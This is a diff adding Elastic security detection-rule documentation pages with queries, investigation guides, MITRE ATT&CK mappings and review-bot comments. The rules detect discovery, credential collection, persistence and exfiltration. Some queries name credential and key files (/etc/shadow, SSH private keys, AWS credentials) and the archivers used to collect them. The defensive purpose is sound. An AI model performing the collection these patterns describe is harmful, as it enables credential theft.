@@ -0,0 +1,145 @@ +[[prebuilt-rule-8-10-5-security-software-discovery-via-grep]] +=== Security Software Discovery via Grep + +Identifies the use of the grep command to discover known third-party macOS and Linux security tools, such as Antivirus or Host Firewall details. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* auditbeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Security Software Discovery via Grep + +After successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software. + +This rule looks for the execution of the `grep` utility with arguments compatible to the enumeration of the security software installed on the host. Attackers can use this information to decide whether or not to infect a system, disable protections, use bypasses, etc. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations. +- Investigate other alerts associated with the user/host during the past 48 hours. 
+- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections. +- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes. +- Inspect the host for suspicious or abnormal behavior in the alert timeframe. +- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations. + +### False positive analysis + +- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where event.type == "start" and +process.name : "grep" and user.id != "0" and + not process.parent.executable : "/Library/Application Support/*" and + process.args : + ("Little Snitch*", + "Avast*", + "Avira*", + "ESET*", + "BlockBlock*", + "360Sec*", + "LuLu*", + "KnockKnock*", + "kav", + "KIS", + "RTProtectionDaemon*", + "Malware*", + "VShieldScanner*", + "WebProtection*", + "webinspectord*", + "McAfee*", + "isecespd*", + "macmnsvc*", + "masvc*", + "kesl*", + "avscan*", + "guard*", + "rtvscand*", + "symcfgd*", + "scmdaemon*", + "symantec*", + "sophos*", + "osquery*", + "elastic-endpoint*" + ) and + not ( + (process.args : "Avast" and process.args : "Passwords") or + (process.parent.args : "/opt/McAfee/agent/scripts/ma" and process.parent.args : "checkhealth") or + (process.command_line : ( + "grep ESET Command-line scanner, version %s -A2", + "grep -i McAfee Web Gateway Core version:", + "grep --color=auto ESET Command-line scanner, version %s -A2" + ) + ) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Software Discovery +** ID: T1518 +** Reference URL: https://attack.mitre.org/techniques/T1518/ +* Sub-technique: +** Name: Security Software Discovery +** ID: T1518.001 +** Reference URL: https://attack.mitre.org/techniques/T1518/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sensitive-files-compression.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sensitive-files-compression.asciidoc new file mode 100644 index 0000000000..ca1b42e7dd --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sensitive-files-compression.asciidoc 
@@ -0,0 +1,112 @@ +[[prebuilt-rule-8-10-5-sensitive-files-compression]] +=== Sensitive Files Compression + +Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials and system configurations. + +*Rule type*: new_terms + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.trendmicro.com/en_ca/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Collection +* Tactic: Credential Access +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 206 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:linux and event.type:start and + process.name:(zip or tar or gzip or hdiutil or 7z) and + process.args: + ( + /root/.ssh/id_rsa or + /root/.ssh/id_rsa.pub or + /root/.ssh/id_ed25519 or + /root/.ssh/id_ed25519.pub or + /root/.ssh/authorized_keys or + /root/.ssh/authorized_keys2 or + /root/.ssh/known_hosts or + /root/.bash_history or + /etc/hosts or + /home/*/.ssh/id_rsa or + /home/*/.ssh/id_rsa.pub or + /home/*/.ssh/id_ed25519 or + /home/*/.ssh/id_ed25519.pub or + /home/*/.ssh/authorized_keys or + /home/*/.ssh/authorized_keys2 or + /home/*/.ssh/known_hosts or + /home/*/.bash_history or + /root/.aws/credentials or + /root/.aws/config or + /home/*/.aws/credentials or + /home/*/.aws/config or + /root/.docker/config.json or + /home/*/.docker/config.json or + /etc/group or + /etc/passwd or + /etc/shadow or + /etc/gshadow + ) + +---------------------------------- + 
+*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Credentials In Files +** ID: T1552.001 +** Reference URL: https://attack.mitre.org/techniques/T1552/001/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Archive Collected Data +** ID: T1560 +** Reference URL: https://attack.mitre.org/techniques/T1560/ +* Sub-technique: +** Name: Archive via Utility +** ID: T1560.001 +** Reference URL: https://attack.mitre.org/techniques/T1560/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user.asciidoc new file mode 100644 index 0000000000..90f1243803 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user.asciidoc 
@@ -0,0 +1,119 @@ +[[prebuilt-rule-8-10-5-sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user]] +=== Sensitive Privilege SeEnableDelegationPrivilege assigned to a User + +Identifies the assignment of the SeEnableDelegationPrivilege sensitive "user right" to a user. The SeEnableDelegationPrivilege "user right" enables computer and user accounts to be trusted for delegation. Attackers can abuse this right to compromise Active Directory accounts and elevate their privileges. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/ +* https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_alert_active_directory_user_control.yml +* https://twitter.com/_nwodtuhs/status/1454049485080907776 +* https://www.thehacker.recipes/ad/movement/kerberos/delegations +* https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0105_windows_audit_authorization_policy_change.md + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Persistence +* Data Source: Active Directory +* Resources: Investigation Guide +* Use Case: Active Directory Monitoring + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Sensitive Privilege SeEnableDelegationPrivilege assigned to a User + +Kerberos delegation is an Active Directory feature that allows user and computer accounts to 
impersonate other accounts, act on their behalf, and use their privileges. Delegation (constrained and unconstrained) can be configured for user and computer objects. + +Enabling unconstrained delegation for a computer causes the computer to store the ticket-granting ticket (TGT) in memory at any time an account connects to the computer, so it can be used by the computer for impersonation when needed. Risk is heightened if an attacker compromises computers with unconstrained delegation enabled, as they could extract TGTs from memory and then replay them to move laterally on the domain. If the attacker coerces a privileged user to connect to the server, or if the user does so routinely, the account will be compromised and the attacker will be able to pass-the-ticket to privileged assets. + +SeEnableDelegationPrivilege is a user right that is controlled within the Local Security Policy of a domain controller and is managed through Group Policy. This setting is named **Enable computer and user accounts to be trusted for delegation**. + +It is critical to control the assignment of this privilege. A user with this privilege and write access to a computer can control delegation settings, perform the attacks described above, and harvest TGTs from any user that connects to the system. + +#### Possible investigation steps + +- Investigate how the privilege was assigned to the user and who assigned it. +- Investigate other potentially malicious activity that was performed by the user that assigned the privileges using the `user.id` and `winlog.activity_id` fields as a filter during the past 48 hours. +- Investigate other alerts associated with the users/host during the past 48 hours. + +### False positive analysis + +- The SeEnableDelegationPrivilege privilege should not be assigned to users. If this rule is triggered in your environment legitimately, the security team should notify the administrators about the risks of using it. 
+ +### Related rules + +- KRBTGT Delegation Backdoor - e052c845-48d0-4f46-8a13-7d0aba05df82 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Remove the privilege from the account. +- Review the privileges of the administrator account that performed the action. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.action:"Authorization Policy Change" and event.code:4704 and + winlog.event_data.PrivilegeList:"SeEnableDelegationPrivilege" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal or Forge Kerberos Tickets +** ID: T1558 +** Reference URL: https://attack.mitre.org/techniques/T1558/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-service-control-spawned-via-script-interpreter.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-service-control-spawned-via-script-interpreter.asciidoc new file mode 100644 index 0000000000..a6ed51a8be --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-service-control-spawned-via-script-interpreter.asciidoc 
@@ -0,0 +1,165 @@ +[[prebuilt-rule-8-10-5-service-control-spawned-via-script-interpreter]] +=== Service Control Spawned via Script Interpreter + +Identifies Service Control (sc.exe) spawning from script interpreter processes to create, modify, or start services. This can potentially indicate an attempt to elevate privileges or maintain persistence. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* logs-system.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Service Control Spawned via Script Interpreter + +Windows services are background processes that run with SYSTEM privileges and provide specific functionality or support to other applications and system components. + +The `sc.exe` command line utility is used to manage and control Windows services on a local or remote computer. Attackers may use `sc.exe` to create, modify, and start services to elevate their privileges from administrator to SYSTEM. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. 
+ +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Examine the command line, registry changes events, and Windows events related to service activities (for example, 4697 and/or 7045) for suspicious characteristics. + - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. 
+- Investigate other alerts associated with the user/host during the past 48 hours. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. + +### False positive analysis + +- This activity is not inherently malicious if it occurs in isolation. As long as the analyst did not identify suspicious activity related to the user, host, and service, such alerts can be dismissed. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Delete the service or restore it to the original configuration. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+ +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +/* This rule is not compatible with Sysmon due to user.id issues */ + +process where host.os.type == "windows" and event.type == "start" and + (process.name : "sc.exe" or process.pe.original_file_name == "sc.exe") and + process.parent.name : ("cmd.exe", "wscript.exe", "rundll32.exe", "regsvr32.exe", + "wmic.exe", "mshta.exe","powershell.exe", "pwsh.exe") and + process.args:("config", "create", "start", "delete", "stop", "pause") and + /* exclude SYSTEM SID - look for service creations by non-SYSTEM user */ + not user.id : "S-1-5-18" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Windows Service +** ID: T1543.003 +** Reference URL: https://attack.mitre.org/techniques/T1543/003/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: 
System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Regsvr32 +** ID: T1218.010 +** Reference URL: https://attack.mitre.org/techniques/T1218/010/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-setcap-setuid-setgid-capability-set.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-setcap-setuid-setgid-capability-set.asciidoc new file mode 100644 index 0000000000..d696f8b10d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-setcap-setuid-setgid-capability-set.asciidoc 
@@ -0,0 +1,68 @@ +[[prebuilt-rule-8-10-5-setcap-setuid-setgid-capability-set]] +=== Setcap setuid/setgid Capability Set + +This rule monitors for the addition of the cap_setuid+ep or cap_setgid+ep capabilities via setcap. Setuid (Set User ID) and setgid (Set Group ID) are Unix-like OS features that enable processes to run with elevated privileges, based on the file owner or group. Threat actors can exploit these attributes to achieve persistence by creating malicious binaries, allowing them to maintain control over a compromised system with elevated permissions. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and +process.name == "setcap" and process.args : "cap_set?id+ep" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Setuid and Setgid +** ID: T1548.001 +** Reference URL: https://attack.mitre.org/techniques/T1548/001/ 
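Review bot: the tags in prebuilt-rule-8-10-5-setcap-setuid-setgid-capability-set.asciidoc list only `Tactic: Persistence`, while the MITRE ATT&CK section of the same file maps the rule to both Persistence (TA0003) and Privilege Escalation (TA0004); add `* Tactic: Privilege Escalation` to the tags (or drop TA0004 from the mapping) so that filtering rules by tag agrees with the framework mapping. Also, the description says the rule "monitors for the addition of the cap_setuid+ep or cap_setgid+ep capabilities", but the query expresses that as the single-character wildcard `process.args : "cap_set?id+ep"`; a one-line comment in the query noting that `?` stands for the `u`/`g` character would spare readers a trip to the EQL wildcard docs.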
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-shared-object-created-or-changed-by-previously-unknown-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-shared-object-created-or-changed-by-previously-unknown-process.asciidoc new file mode 100644 index 0000000000..40d5ee8442 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-shared-object-created-or-changed-by-previously-unknown-process.asciidoc 
@@ -0,0 +1,70 @@ +[[prebuilt-rule-8-10-5-shared-object-created-or-changed-by-previously-unknown-process]] +=== Shared Object Created or Changed by Previously Unknown Process + +This rule monitors the creation of shared object files by previously unknown processes. The creation of a shared object file involves compiling code into a dynamically linked library that can be loaded by other programs at runtime. While this process is typically used for legitimate purposes, malicious actors can leverage shared object files to execute unauthorized code, inject malicious functionality into legitimate processes, or bypass security controls. This allows malware to persist on the system, evade detection, and potentially compromise the integrity and confidentiality of the affected system and its data. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://threatpost.com/sneaky-malware-backdoors-linux/180158/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:linux and event.action:(creation or file_create_event or file_rename_event or rename) and +file.path:(/dev/shm/* or /usr/lib/*) and file.extension:so and +process.name: ( * and not ("5" or "dockerd" or "dpkg" or "rpm" or "snapd" or "exe" or "yum" or "vmis-launcher" + or "pacman" or "apt-get" or "dnf")) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: 
https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: Dynamic Linker Hijacking +** ID: T1574.006 +** Reference URL: https://attack.mitre.org/techniques/T1574/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-solarwinds-process-disabling-services-via-registry.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-solarwinds-process-disabling-services-via-registry.asciidoc new file mode 100644 index 0000000000..fd71bcf62b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-solarwinds-process-disabling-services-via-registry.asciidoc 
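Review bot: in the Shared Object rule query, the exclusion list `not ("5" or "dockerd" or "dpkg" ...)` contains a bare `"5"` as a process name with no comment saying which process that is; if it is intentional it needs a comment in the query, otherwise it looks like a leftover. Two scoping gaps also deserve a sentence in the description: `file.extension:so` does not match versioned libraries (ECS `file.extension` is the last segment, so `libfoo.so.1` has extension `1`), and the path filter covers only `/dev/shm/*` and `/usr/lib/*`, not `/lib/*`, `/usr/lib64/*` or `/usr/local/lib/*`.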
@@ -0,0 +1,106 @@ +[[prebuilt-rule-8-10-5-solarwinds-process-disabling-services-via-registry]] +=== SolarWinds Process Disabling Services via Registry + +Identifies a SolarWinds binary modifying the start type of a service to be disabled. An adversary may abuse this technique to manipulate relevant security services. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Initial Access +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and registry.path : ( + "HKLM\\SYSTEM\\*ControlSet*\\Services\\*\\Start", + "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Services\\*\\Start" + ) and + registry.data.strings : ("4", "0x00000004") and + process.name : ( + "SolarWinds.BusinessLayerHost*.exe", + "ConfigurationWizard*.exe", + "NetflowDatabaseMaintenance*.exe", + "NetFlowService*.exe", + "SolarWinds.Administration*.exe", + "SolarWinds.Collector.Service*.exe", + "SolarwindsDiagnostics*.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: 
https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Supply Chain Compromise +** ID: T1195 +** Reference URL: https://attack.mitre.org/techniques/T1195/ +* Sub-technique: +** Name: Compromise Software Supply Chain +** ID: T1195.002 +** Reference URL: https://attack.mitre.org/techniques/T1195/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device-via-airdrop.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device-via-airdrop.asciidoc new file mode 100644 index 0000000000..7fc9d978f6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device-via-airdrop.asciidoc 
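Review bot: the `==== Investigation guide` section of the SolarWinds rule page is an empty `[source, markdown]` block; either drop the heading or populate it, since an empty fenced block renders as a blank box. On the query, `registry.data.strings : ("4", "0x00000004")` matches only a service `Start` value being written as 4 (disabled) by one of the listed `SolarWinds.*` / `NetFlow*` / `ConfigurationWizard*` processes; a sentence in the description stating that the rule covers the start-type write and nothing else about the service would set analyst expectations when triaging.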
@@ -0,0 +1,58 @@ +[[prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device-via-airdrop]] +=== Spike in Bytes Sent to an External Device via Airdrop + +A machine learning job has detected high bytes of data written to an external device via Airdrop. In a typical operational setting, there is usually a predictable pattern or a certain range of data that is written to external devices. An unusually large amount of data being written is anomalous and can signal illicit data copying or transfer activities. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-2h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Other Network Medium +** ID: T1011 +** Reference URL: https://attack.mitre.org/techniques/T1011/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device.asciidoc new file mode 100644 index 0000000000..8d98094589 --- /dev/null 
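Review bot: the Airdrop ML rule page never names the anomaly detection job that drives it, and its `==== Investigation guide` block is empty. A `machine_learning` rule only produces alerts while its job is running, so the page should state the job ID (from the Data Exfiltration Detection integration linked at `https://docs.elastic.co/en/integrations/ded`) and the anomaly score threshold the rule alerts on, and the empty guide should either be filled or removed.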
